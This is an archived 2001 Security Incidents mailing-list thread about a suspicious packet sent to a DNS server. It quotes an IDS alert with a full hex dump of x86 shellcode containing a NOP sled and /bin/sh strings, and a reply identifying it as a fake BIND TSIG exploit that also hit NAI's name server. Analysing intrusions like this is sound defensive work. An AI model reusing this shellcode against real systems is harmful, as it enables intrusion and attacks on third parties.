Security Incidents mailing list archives
Re: Named TSIG exploit ?
From: Paul Cardon <paul () MOQUIJO COM>
Date: Mon, 5 Feb 2001 16:48:52 -0500
The source ran the fake BIND TSIG exploit released on BUGTRAQ last week using your system as the intended target. Pretty sad since it means they were also (unknowingly?) attacking NAI's name server. -paul Mihai Moldovanu wrote:
[**] IDS362 - MISC - Shellcode X86 NOPS-UDP [**] 02/01-09:31:30.076442 0:10:7B:40:91:C0 -> 0:1:2:F7:76:B8 type:0x800 len:0x22A 141.85.31.233:1025 -> OurNameServer:53 UDP TTL:60 TOS:0x0 ID:0 DF Len: 520 00 D0 84 00 00 01 00 00 00 00 00 01 00 CD 80 83 ................ C4 08 3D 04 00 18 01 7C 05 E8 15 00 00 00 E8 80 ..=....|........ 00 00 00 E8 53 49 47 4E 41 54 55 52 45 E8 52 53 ....SIGNATURE.RS 41 00 00 EB 34 5E BB 01 00 00 00 89 F1 B8 66 00 A...4^........f. 00 00 CD 80 89 46 14 8D 46 30 89 46 18 31 C0 89 .....F..F0.F.1.. 46 20 8D 46 0C 89 46 24 B8 66 00 00 00 BB 0B 00 F .F..F$.f...... 00 00 8D 4E 14 CD 80 EB EF E8 C7 FF FF FF 02 00 ...N............ 00 00 02 00 00 00 11 00 00 00 02 00 00 35 A1 45 .............5.E 03 96 FF FF FF FF EF FF FF FF 00 04 00 00 00 00 ................ 00 00 02 5F 9A 80 10 00 00 00 2F 62 69 6E 2F 73 ..._....../bin/s 68 00 00 EB 37 5E 6A 11 6A 02 6A 02 6A 66 8D 05 h...7^j.j.j.jf.. 61 00 00 00 CD 80 89 C2 6A 10 89 F0 50 31 C0 50 a.......j...P1.P 68 24 10 00 00 8D 46 0F 50 52 68 88 00 00 00 8D h$....F.PRh..... 05 85 00 00 00 CD 80 83 C4 1C EB DC E8 C4 FF FF ................ FF 00 02 00 35 A1 45 03 96 E8 B1 FF FF FF 2F 62 ....5.E......./b 69 6E 2F 73 68 00 00 90 90 90 90 90 90 90 90 90 in/sh........... 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ The shellcode inside the second packet it's pretty strage . Anyone can take a deeper look at it ?
Current thread:
- Named TSIG exploit ? Mihai Moldovanu (Feb 05)
- Re: Named TSIG exploit ? Paul Cardon (Feb 05)